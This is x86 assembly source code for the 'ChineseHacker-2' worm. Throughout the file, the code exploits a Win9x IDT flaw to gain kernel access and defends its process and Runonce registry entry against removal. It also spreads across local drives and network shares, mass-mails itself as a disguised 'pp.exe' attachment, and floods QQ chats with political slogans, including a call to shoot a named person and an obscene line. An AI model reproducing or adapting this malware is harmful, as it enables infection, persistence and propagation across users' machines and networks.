call PushMutexName
db 'ChineseHacker-2',0
PushMutexName:
call [esi.KnlCreateMutexA],0,0
call [esi.KnlGetLastError]
or eax,eax ;检查病毒是否已经运行
jz short ExecOldProgram
int 3; ;人工引发异常执行原程序,JmpOldApp
db 0e9h ;静态反汇编干扰
CheckRemoteAndWait:
mov eax,[esi.DataRemoteThread]
call [esi.KnlWaitForSingleObject],eax,1000*60;
cmp eax,-1 ;睡眠8小时
jnz short AddWordToQQMsg
NeedCreateRemote:
push esi
call PushWaitErrorProc
pop esi
call GetNetSendMsg
db 'Net Send * My god! Some one killed ChineseHacker-2 Monitor',0
GetNetSendMsg:
pop eax
call [esi.KnlWinExec],eax,0
jmp short CheckRemoteAndWait
PushWaitErrorProc:
pop ecx
call SetSehFrame
call ProcessProtect ;重新启动远程线程保护/内带意外
db 0e9h ;静态反汇编干扰
AddWordToQQMsg:
call GetVirusBaseInRegEdi
GetVirusBaseInRegEdi:
pop edi
CheckRemoteAndWaitAgain:
mov eax,[esi.DataRemoteThread]
call [esi.KnlWaitForSingleObject],eax,1000*60;
push eax ;睡眠10分钟
call [esi.KnlTerminateThread],ebx,0
pop eax
cmp eax,-1
jz short NeedCreateRemoteAgain
int 3; ;人工意外,继续搜索文件
db 0e9h ;静态反汇编干扰
NeedCreateRemoteAgain:
push esi
call PushWaitErrorProcAgain
pop esi
jmp short CheckRemoteAndWaitAgain
PushWaitErrorProcAgain:
pop ecx
call SetSehFrame
call ProcessProtect ;重新启动远程线程保护/内带意外
db 0e9h ;静态反汇编干扰
PushNextRunErrorProc: ;保护注册表与创建远程线程
pop ecx
call SetSehFrame
RegisterProtect:
sub esp,100h ;构造病毒路径
call BuildVirusPathInStack,esp
mov edi,esp
PushKnlApiStr: ;:ecx=函数名个数
pop eax ;弹出返回地址
mov ecx,esp
call PushKnlApiStr33
db 'GetSystemTime',0
PushKnlApiStr33:
call PushKnlApiStr32
db 'GetComputerNameA',0
PushKnlApiStr32:
call PushKnlApiStr31
db 'WideCharToMultiByte',0
PushKnlApiStr31:
call PushKnlApiStr30
db 'TerminateThread',0
PushKnlApiStr30:
call PushKnlApiStr29
db 'CreateThread',0
PushKnlApiStr29:
call PushKnlApiStr28
db '_lcreat',0
PushKnlApiStr28:
call PushKnlApiStr27
db 'GetSystemDirectoryA',0
PushKnlApiStr27:
call PushKnlApiStr26
db 'VirtualAllocEx',0
PushKnlApiStr26:
call PushKnlApiStr25
db 'WaitForSingleObject',0
PushKnlApiStr25:
call PushKnlApiStr24
db 'CloseHandle',0
PushKnlApiStr24:
call PushKnlApiStr23
db 'CreateKernelThread',0
PushKnlApiStr23:
call PushKnlApiStr22
db 'CreateRemoteThread',0
PushKnlApiStr22:
call PushKnlApiStr21
db 'WriteProcessMemory',0
PushKnlApiStr21:
call PushKnlApiStr20
db 'OpenProcess',0
PushKnlApiStr20:
call PushKnlApiStr19
db 'GetCurrentProcessId',0
PushKnlApiStr19:
call PushKnlApiStr18
db 'RegisterServiceProcess',0
PushKnlApiStr18:
call PushKnlApiStr17
db 'Sleep',0
PushKnlApiStr17:
call PushKnlApiStr16
db '_lclose',0
PushKnlApiStr16:
call PushKnlApiStr15
db '_llseek',0
PushKnlApiStr15:
call PushKnlApiStr14
db '_lwrite',0
PushKnlApiStr14:
call PushKnlApiStr13
db '_lread',0
PushKnlApiStr13:
call PushKnlApiStr12
db '_lopen',0
PushKnlApiStr12:
call PushKnlApiStr11
db 'SetFileTime',0
PushKnlApiStr11:
call PushKnlApiStr10
db 'SetFileAttributesA',0
PushKnlApiStr10:
call PushKnlApiStr09
db 'FindClose',0
PushKnlApiStr09:
call PushKnlApiStr08
db 'FindNextFileA',0
PushKnlApiStr08:
call PushKnlApiStr07
db 'FindFirstFileA',0
PushKnlApiStr07:
call PushKnlApiStr06
db 'SetCurrentDirectoryA',0
PushKnlApiStr06:
call PushKnlApiStr05
db 'GetDriveTypeA',0
PushKnlApiStr05:
call PushKnlApiStr04
db 'WinExec',0
PushKnlApiStr04:
call PushKnlApiStr03
db 'GetCommandLineA',0
PushKnlApiStr03:
call PushKnlApiStr02
db 'GetLastError',0
PushKnlApiStr02:
call PushKnlApiStr01
db 'CreateMutexA',0
PushKnlApiStr01:
call PushKnlApiStr00
db 'LoadLibraryA',0
PushKnlApiStr00:
sub ecx,esp
shr ecx,2
jmp eax
db 0e9h ;静态反汇编干扰
PushUser32ApiStr:
pop eax
mov ecx,esp
call PushUser32ApiStr05
db 'wsprintfA',0
PushUser32ApiStr05:
call PushUser32ApiStr04
db 'SendMessageA',0
PushUser32ApiStr04:
call PushUser32ApiStr03
db 'GetWindow',0
PushUser32ApiStr03:
call PushUser32ApiStr02
db 'MessageBoxA',0
PushUser32ApiStr02:
call PushUser32ApiStr01
db 'FindWindowA',0
PushUser32ApiStr01:
call PushUser32ApiStr00
db 'GetWindowThreadProcessId',0
PushUser32ApiStr00:
sub ecx,esp
shr ecx,2
jmp eax
db 0e9h ;静态反汇编干扰
PushAdvApiStr:
pop eax
mov ecx,esp
call PushAdvApi03
db 'RegNotifyChangeKeyValue',0
PushAdvApi03:
call PushAdvApi02
db 'RegQueryValueExA',0
PushAdvApi02:
call PushAdvApi01
db 'RegSetValueExA',0
PushAdvApi01:
call PushAdvApi00
db 'RegOpenKeyA',0
PushAdvApi00:
sub ecx,esp
shr ecx,2
jmp eax
db 0e9h ;静态反汇编干扰
PushMprApiStr:
pop eax
mov ecx,esp
call PushMprAPiStr02
db 'WNetCloseEnum',0
PushMprAPiStr02:
call PushMprApiStr01
db 'WNetEnumResourceA',0
PushMprApiStr01:
call PushMprApiStr00
db 'WNetOpenEnumA',0
PushMprApiStr00:
sub ecx,esp
shr ecx,2
jmp eax
db 0e9h ;静态反汇编干扰
PushWsApiStr:
pop eax
mov ecx,esp
call PushWsApiStr08
db 'recv',0
PushWsApiStr08:
call PushWsApiStr07
db 'closesocket',0
PushWsApiStr07:
call PushWsApiStr06
db 'socket',0
PushWsApiStr06:
call PushWsApiStr05
db 'connect',0
PushWsApiStr05:
call PushWsApiStr04
db 'gethostbyname',0
PushWsApiStr04:
call PushWsApiStr03
db 'htons',0
PushWsApiStr03:
call PushWsApiStr02
db 'send',0
PushWsApiStr02:
call PushWsApiStr01
db 'WSACleanup',0
PushWsApiStr01:
call PushWsApiStr00
db 'WSAStartup',0
PushWsApiStr00:
sub ecx,esp
shr ecx,2
jmp eax
db 0e9h ;静态反汇编干扰
PushQQMsg:
pop eax
mov ecx,esp
call PushQQMsg00
db '枪毙李洪志!',0
PushQQMsg00:
call PushQQMsg01
db '去他妈的***!',0
PushQQMsg01:
call PushQQMsg02
db '反对邪教,崇尚科学!',0
PushQQMsg02:
call PushQQMsg03
db '打倒本拉登!',0
PushQQMsg03:
call PushQQMsg04
db '向英雄王伟致意!',0
PushQQMsg04:
call PushQQMsg05
db '反对霸权主义!',0
PushQQMsg05:
call PushQQMsg06
db '世界需要和平!',0
PushQQMsg06:
call PushQQMsg07
db '社会主义好!',0
PushQQMsg07:
sub ecx,esp
jmp eax
db 0e9h ;静态反汇编干扰
BuildVirusPathInStack proc Stack: dword
pushad
mov edi,Stack
call [esi.KnlGetSystemDirectoryA],edi,100h
add edi,eax
call GetVirusFileName
db '\runouce.exe',0
GetVirusFileName:
pop esi
mov ecx,16
cld
rep movsb ;合成病毒路径名
popad
ret
BuildVirusPathInStack endp
db 0e9h ;静态反汇编干扰
EnumLogDrive proc
;列举本地逻辑磁盘文件
mov ecx,24
mov edx,'\:C'
ContEnumLogDrive:
push ecx
push edx
call [esi.KnlGetDriveTypeA],esp
cmp eax,2 ;是不可访问磁盘
jb short ContNextLogDrive
cmp eax,5 ;是CDROM光盘
jz short ContNextLogDrive
call EnumFileObject,esp
ContNextLogDrive:
pop edx
inc edx
pop ecx
loop short ContEnumLogDrive
ret
EnumLogDrive endp
db 0e9h ;静态反汇编干扰
EnumNetResource proc
;列举网络资源
xor edi,edi ;edi: NetData
call PushEnumNetWorkGroup
call PushEnumNetComputer
call PushEnumNetComputerShareDir
call PushEnumNetFile
mov eax,[edi.lpRemoteName]
call EnumFileObject,eax;列举计算机共享目录里的文件
ret
db 0e9h ;静态反汇编干扰
PushEnumNetFile: ;列举计算机共享目录
call EnumNetObject,RESOURCEUSAGE_CONNECTABLE,edi
ret
db 0e9h ;静态反汇编干扰
PushEnumNetComputerShareDir: ;列举计算机
call EnumNetObject,RESOURCEUSAGE_CONTAINER,edi
ret
db 0e9h ;静态反汇编干扰
PushEnumNetComputer: ;列举工作组
call EnumNetObject,RESOURCEUSAGE_CONTAINER,edi
ret
db 0e9h ;静态反汇编干扰
PushEnumNetWorkGroup: ;列举网络根
call EnumNetObject,RESOURCEUSAGE_CONTAINER,edi
ret
db 0e9h ;静态反汇编干扰
EnumNetResource endp
EnumNetObject proc Flag:dword,NetData:dword,CallBack:dword
;用来列举局域网某种对象
pushad
push eax
call [esi.MprWNetOpenEnumA],RESOURCE_GLOBALNET,RESOURCETYPE_DISK,Flag,NetData,esp
pop ebx ;弹出hEnum句柄,平衡堆栈
or eax,eax
jnz short EnumNetObjectError
sub esp,MAX_BUFF_SIZE;划分堆栈空间大小
LoopEnumNetObject:
mov edx,esp
push L 1h ;一次列举一个
mov eax,esp
push MAX_BUFF_SIZE ;缓冲区大小
call [esi.MprWNetEnumResourceA],ebx,eax,edx,esp
pop ecx
pop ecx ;平衡堆栈
or eax,eax
jnz short EnumNetObjectOver
mov edi,esp
call CallBack ;调用回调函数,利用edi,传递参数
jmp short LoopEnumNetObject
db 0e9h ;静态反汇编干扰
EnumNetObjectOver:
call [esi.MprWNetCloseEnum],ebx
add esp,MAX_BUFF_SIZE
EnumNetObjectError:
popad
ret
EnumNetObject endp
db 0e9h ;静态反汇编干扰
EnumFileObject proc BootDir:dword
;用来列举目录/网络上某个共享目录
pushad
mov eax,BootDir
mov eax,[eax]
or eax,20202020h
cmp eax,'nniw' ;不感染WINN...目录
jz short SetDirError
cmp eax,'dniw' ;不感染WIND...目录
jz short SetDirError
call [esi.KnlSetCurrentDirectoryA],BootDir ;设为当前目录
or eax,eax
jz short SetDirError
call FoundDirObject,BootDir
sub esp,MAX_BUFF_SIZE;1000h字节的缓冲区
mov [esp],L 2a2e2ah ;建立"*.*"字符串
mov eax,esp
call [esi.KnlFindFirstFileA],eax,esp
mov ebx,eax
cmp eax,-1
jz short EnumFileObjectError
LoopEnumFileObject:
call [esi.KnlFindNextFileA],ebx,esp
or eax,eax
jz short EnumFileObjectOver
lea edx,[esp.cFileName]
mov eax,[esp.dwFileAttributes]
and eax,10h ;测试文件属性
jz short IsFileObject
IsDirObject: ;是一个目录
mov eax,[edx]
cmp al,'.' ;测试是否点目录,是就不处理
jz short LoopEnumFileObject
call EnumFileObject,edx;递归调用
jmp short LoopEnumFileObject
db 0e9h ;静态反汇编干扰
IsFileObject: ;是一个文件
call FoundFileObject,esp;操作文件
jmp short LoopEnumFileObject
db 0e9h ;静态反汇编干扰
EnumFileObjectOver:
call [esi.KnlFindClose],ebx
EnumFileObjectError:
mov dword ptr[esp],L 2e2eh ;恢复原来的当前目录 建立字符串".."
call [esi.KnlSetCurrentDirectoryA],esp
add esp,MAX_BUFF_SIZE;平衡堆栈
SetDirError:
popad
ret
EnumFileObject endp
db 0e9h ;静态反汇编干扰
FoundDirObject proc DirName: dword
pushad
call PushOptDirError
popad
ret
db 0e9h ;静态反汇编干扰
PushOptDirError:
pop ecx ;意外忽略设置
call SetSehFrame
call GetFoundDirCallBackAddr
call [edx],DirName
int 3 ;人工意外
FoundDirObject endp
db 0e9h ;静
FoundFileObject proc FindData:dword
pushad
call PushOptFileError
popad
ret
db 0e9h ;静态反汇编干扰
PushOptFileError:
pop ecx ;意外忽略设置
call SetSehFrame
call GetFoundFileCallBackAddr
call [edx],FindData
int 3 ;人工意外
FoundFileObject endp
db 0e9h ;静态反汇编干扰
GetFoundDirCallBackAddr:
call PushFoundDirCallBackAddr
FoundDirCallBackAddr dd ?
PushFoundDirCallBackAddr:
pop edx
ret
db 0e9h ;静态反汇编干扰
GetFoundFileCallBackAddr:
call PushFoundFileCallBackAddr
FoundFileCallBackAddr dd ?
PushFoundFileCallBackAddr:
pop edx
ret
db 0e9h ;静态反汇编干扰
GetFileExtName proc FileName: dword
mov eax,FileName
ContIncEax:
inc eax
cmp byte ptr[eax],0
jnz short ContIncEax
mov eax,[eax-4]
or eax,20202020h
ret
GetFileExtName endp
db 0e9h ;静态反汇编干扰
OptLocalDir proc DirName: dword
call [esi.KnlSleep],10;消除CPU时间占有异常
ret
OptLocalDir endp
db 0e9h ;静态反汇编干扰
FormatMailHeader proc MailHeader: dword,eMail: dword
local MailHeaderLong: dword
pushad
mov eax,100h
sub esp,eax
mov edx,esp
push eax
call [esi.KnlGetComputerNameA],edx,esp
pop eax
call PushMailData
db 'HELO btamail.net.cn',0dh,0ah
db 'MAIL FROM: imissyou@btamail.net.cn',0dh,0ah
db 'RCPT TO: %s',0dh,0ah
db 'DATA',0dh,0ah
db 'FROM: %s@yahoo.com',0dh,0ah
db 'TO: %s',0dh,0ah
db 'SUBJECT: %s is comming!',0dh,0ah
db 'MIME-Version: 1.0',0dh,0ah
db 'Content-type: multipart/mixed; boundary="#BOUNDARY#"',0dh,0ah
db 0dh,0ah
db '--#BOUNDARY#',0dh,0ah
db 'Content-Type: text/html',0dh,0ah
db 'Content-Transfer-Encoding: quoted-printable',0dh,0ah
db 0dh,0ah
db '',0dh,0ah
db 0dh,0ah
db '--#BOUNDARY#',0dh,0ah
db 'MIME-Version: 1.0',0dh,0ah
db 'Content-Type: audio/x-wav; name="pp.exe"',0dh,0ah
db 'Content-Transfer-Encoding: base64',0dh,0ah
db 'Content-id: THE-CID',0dh,0ah
db 0dh,0ah,0
PushMailData:
pop eax
mov edi,esp
call [esi.UserwsprintfA],MailHeader,eax,eMail,edi,eMail,edi
mov esp,edi
mov MailHeaderLong,eax
add esp,100h
popad
mov eax,MailHeaderLong
ret
FormatMailHeader endp
AnsiToBase64 proc AnsiBuff: dword,AnsiSize:dword,Base64Buff:dword
local nBase64Size: dword
pushad
mov nBase64Size,0
call GetBase64Char
Base64Char db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
db 'abcdefghijklmnopqrstuvwxyz'
db '0123456789+/',0
GetBase64Char:
pop esi ;esi=Offset Base64Char
mov edi,Base64Buff
mov edx,AnsiSize
shl edx,3 ;计算总位数
xor ebx,ebx ;存索引
ContTurn:
xor eax,eax ;存数值
mov ecx,6
ContGetBit:
shl eax,1
call GetBit,AnsiBuff,ebx
dec edx
jz short GetBitOver
inc ebx
loop short ContGetBit
mov al,[esi+eax]
cld
stosb
inc nBase64Size
jmp short ContTurn
GetBitOver:
dec ecx
shl eax,cl
mov al,[esi+eax]
cld
stosb
inc nBase64Size
shr ecx,1
add nBase64Size,ecx
mov al,'=' ;位数不够添“=”号,一个等号代表两位0
cld
rep stosb
xor al,al
stosb
popad
mov eax,nBase64Size
ret
AnsiToBase64 endp
;AnsiToBase64子程序,得到一位的值
GetBit proc uses ecx edx esi,SrcStr:DWORD,nCx:DWORD
mov esi,SrcStr
mov ecx,nCx
mov edx,ecx
shr edx,3
mov dl,[esi+edx]
not cl
and cl,07h
shr dl,cl
and dl,01h
or al,dl
ret
GetBit endp
SetSehFrame: ;ecx=忽略错误继续执行地址
pop eax ;弹出返回地址
push ecx ;保存忽略错误继续执行地址
call PushExceptionProc
jmp short Exception
db 0e9h ;静态反汇编干扰
PushExceptionProc:
push fs:dword ptr[0]
mov fs:[0],esp
call GetSaveEspAddr
push dword ptr[edx] ;保存以前的Esp值
mov [edx],esp ;保存现在的Esp值
jmp eax
db 0e9h ;静态反汇编干扰
ClearSehFrame:
pop eax ;弹出返回地址
call GetSaveEspAddr
mov esp,[edx] ;恢复Esp值
pop dword ptr[edx] ;恢复原来的Esp值
pop fs:dword ptr[0]
pop ecx
pop ecx ;弹出忽略错误继续执行地址
jmp eax
db 0e9h ;静态反汇编干扰
GetSaveEspAddr:
call PushOffsetSaveEspAddr
dd ?
PushOffsetSaveEspAddr:
pop edx
ret
db 0e9h ;静态反汇编干扰
Exception proc pRecord,pFrame,pContext,pDispatch
call PushSehBackProc
call ClearSehFrame ;自动清除意外Seh
jmp ecx
db 0e9h ;静态反汇编干扰
PushSehBackProc:
pop ecx
mov eax,pContext
mov [eax.cx_Eip],ecx
xor eax,eax ;忽略错误继续执行
ret
Exception endp
UnzipVirusToFile: ;ebx=hFile
call GetVirusZipData
db 04Dh,05Ah,050h,000h,001h,002h,000h,003h,004h,000h,001h,00Fh,000h,001h,0FFh,0FFh
db 000h,002h,0B8h,000h,007h,040h,000h,001h,01Ah,000h,022h,001h,000h,002h,0BAh,010h
db 000h,001h,00Eh,01Fh,0B4h,009h,0CDh,021h,0B8h,001h,04Ch,0CDh,021h,090h,090h,054h
db 068h,069h,073h,020h,070h,072h,06Fh,067h,072h,061h,06Dh,020h,06Dh,075h,073h,074h
db 020h,062h,065h,020h,072h,075h,06Eh,020h,075h,06Eh,064h,065h,072h,020h,057h,069h
db 06Eh,033h,032h,00Dh,00Ah,024h,037h,000h,088h,050h,045h,000h,002h,04Ch,001h,004h
db 000h,001h,0B5h,02Ch,0EFh,082h,000h,008h,0E0h,000h,001h,08Eh,081h,00Bh,001h,002h
db 019h,000h,001h,002h,000h,003h,006h,000h,007h,010h,000h,003h,010h,000h,003h,020h
db 000h,004h,040h,000h,002h,010h,000h,003h,002h,000h,002h,001h,000h,007h,003h,000h
db 001h,00Ah,000h,006h,050h,000h,003h,004h,000h,006h,002h,000h,005h,010h,000h,002h
db 020h,000h,004h,010h,000h,002h,010h,000h,006h,010h,000h,00Ch,030h,000h,002h,04Eh
db 000h,01Ch,040h,000h,002h,00Ch,000h,053h,043h,04Fh,044h,045h,000h,005h,010h,000h
db 003h,010h,000h,003h,002h,000h,003h,006h,000h,00Eh,020h,000h,002h,060h,044h,041h
db 054h,041h,000h,005h,010h,000h,003h,020h,000h,003h,002h,000h,003h,008h,000h,00Eh
db 040h,000h,002h,0C0h,02Eh,069h,064h,061h,074h,061h,000h,003h,010h,000h,003h,030h
db 000h,003h,002h,000h,003h,00Ah,000h,00Eh,040h,000h,002h,0C0h,02Eh,072h,065h,06Ch
db 06Fh,063h,000h,003h,010h,000h,003h,040h,000h,003h,002h,000h,003h,00Ch,000h,00Eh
db 040h,000h,002h,050h,000h,0FFh,000h,0FFh,000h,0FFh,000h,06Bh,0C3h,0FFh,025h,030h
db 030h,040h,000h,0FFh,000h,0FFh,000h,0FFh,000h,0FDh,028h,030h,000h,00Ah,038h,030h
db 000h,002h,030h,030h,000h,016h,046h,030h,000h,006h,046h,030h,000h,006h,04Bh,045h
db 052h,04Eh,045h,04Ch,033h,032h,02Eh,064h,06Ch,06Ch,000h,004h,053h,06Ch,065h,065h
db 070h,000h,0FFh,000h,0B5h,010h,000h,002h,00Ch,000h,003h,003h,030h,000h,0FFh,000h
db 0FFh,000h,0FFh,000h,0F9h,000h,000h
GetVirusZipData:
pop edi ;得到压缩后的PE文件数据
ContUnZipVirus:
mov al,[edi]
inc edi
or al,al
jz short WriteVirusSomeBytes
push eax
mov eax,esp
call [esi.KnlLWrite],ebx,eax,01
pop eax
jmp short ContUnZipVirus
WriteVirusSomeBytes:
movzx ecx,byte ptr[edi]
inc edi
jecxz UnzipVirusEnd ;持续解压,直到遇到双0
ContWriteVirusBytes:
push ecx
push eax
mov eax,esp
call [esi.KnlLWrite],ebx,eax,01
pop eax
pop ecx
loop ContWriteVirusBytes
jmp short ContUnZipVirus
UnzipVirusEnd:
ret
db 0e9h ;静态反汇编干扰
SendQQMsg proc Param: dword
sub esp,100h
xor esi,esi
BuildQQMsg:
mov edi,esp
mov ax,0a0dh
mov ecx,12
cld
rep stosw
call PushQQMsg
mov edx,[esp+esi*4]
add esp,ecx
StoreQQMsg:
mov al,[edx]
inc edx
cld
stosb
or al,al
jnz short StoreQQMsg
call PushQQWndText
db '发送消息',0
PushQQWndText:
call GetFindWindowA
FindWindowA9x2k dd ?
GetFindWindowA:
pop eax
call [eax],0
or eax,eax
jz short WaitForQQWnd
mov ebx,eax
call GetGetWindow
GetWindow9x2k dd ?
GetGetWindow:
pop eax
call [eax],ebx,GW_CHILD
or eax,eax
jz short WaitForQQWnd
mov ebx,eax
call GetSendMessageA
SendMessageA9x2k dd ?
GetSendMessageA:
pop edi
sub esp,1000h
call [edi],ebx,WM_GETTEXT,1000h,esp
add esp,1000h
or eax,eax
jnz short WaitForQQWnd
call [edi],ebx,WM_SETTEXT,1000h,esp
inc esi
and esi,07h
jnz short WaitForQQWnd
add esp,100h
ret
WaitForQQWnd:
call GetSleep
Sleep9x2k dd ?
GetSleep:
pop eax
call [eax],500
jmp BuildQQMsg
SendQQMsg endp
db 0e9h ;静态反汇编干扰
RegisterProtectProc proc hKey:dword
mov ebx,hKey ;注册表保护过程,9x/2k实用
sub esp,100h
mov edi,esp
call GetProtectKeyName
db 'Runonce',0
GetProtectKeyName:
pop esi
push 100h
call GetAdvRegQueryValueExA
AdvRegQueryValueExA9x2k dd ?
GetAdvRegQueryValueExA:
pop eax ;读出原始值保存在堆栈中
call [eax],ebx,esi,0,0,edi,esp
pop eax
WaitRegChangeNotify:
call GetAdvRegNotifyChangeKeyValue
AdvRegNotifyChangeKeyValue9x2k dd ?
GetAdvRegNotifyChangeKeyValue:
pop eax ;等待注册表改变通知
call [eax],ebx,0,4,0,0
call GetAdvRegSetValueExA
AdvRegSetValueExA9x2k dd ?
GetAdvRegSetValueExA:
pop eax ;还原原始值
call [eax],ebx,esi,0,1,edi,100h
jmp short WaitRegChangeNotify
RegisterProtectProc endp
db 0e9h ;静态反汇编干扰
ProcessProtectProc proc ProcID:dword
call GetKnlOpenProcess
KnlOpenProcess9x2k dd ?
GetKnlOpenProcess:
pop eax
call [eax],PROCESS_ALL_ACCESS,0,ProcID
or eax,eax ;打开进程
jz short ExitProtectProc
mov ebx,eax
call GetKnlWaitForSingleObject
KnlWaitForSingleObject9x2k dd ?
GetKnlWaitForSingleObject:
pop eax ;等待进程结束
call [eax],ebx,-1h
call GetFileNameAddress
GetFileNameAddress:
pop ecx
add ecx,offset FullPath-offset GetFileNameAddress
call GetKnlWinExec
KnlWinExec9x2k dd ?
GetKnlWinExec:
pop eax ;重起病毒进程
call [eax],ecx,01
ExitProtectProc:
ret
ProcessProtectProc endp
ProcessProtectProcSize=$-offset ProcessProtectProc
FullPath db 0e9h
MoveDataToKnl proc Src:dword,Des:dword,nCx:dword
pushad
push eax
sidt [esp-2]
pop eax
add eax,3*8 ;IDT03号
mov ebx,[eax]
mov edx,[eax+4]
call SetIdt03
pushad
mov [eax],ebx
mov [eax+4],edx
cld
rep movsb ;复制代码/数据到内核代码指定位置
popad
iret
SetIdt03:
cli
pop word ptr[eax]
pop word ptr[eax+6]
mov esi,Src
mov edi,Des
mov ecx,nCx
int 3; ;利用Win9x,IDT漏洞进入系统内核
sti
popad
ret
MoveDataToKnl endp
db 0e9h ;静态反汇编干扰
DbgMsg proc pMsg:dword
pushad
mov eax,pMsg
call [esi.UserMessageBoxA],0,eax,eax,0
popad
ret
DbgMsg endp
dd 0,0
VirusEnd:
;这里是变形解密代码
ret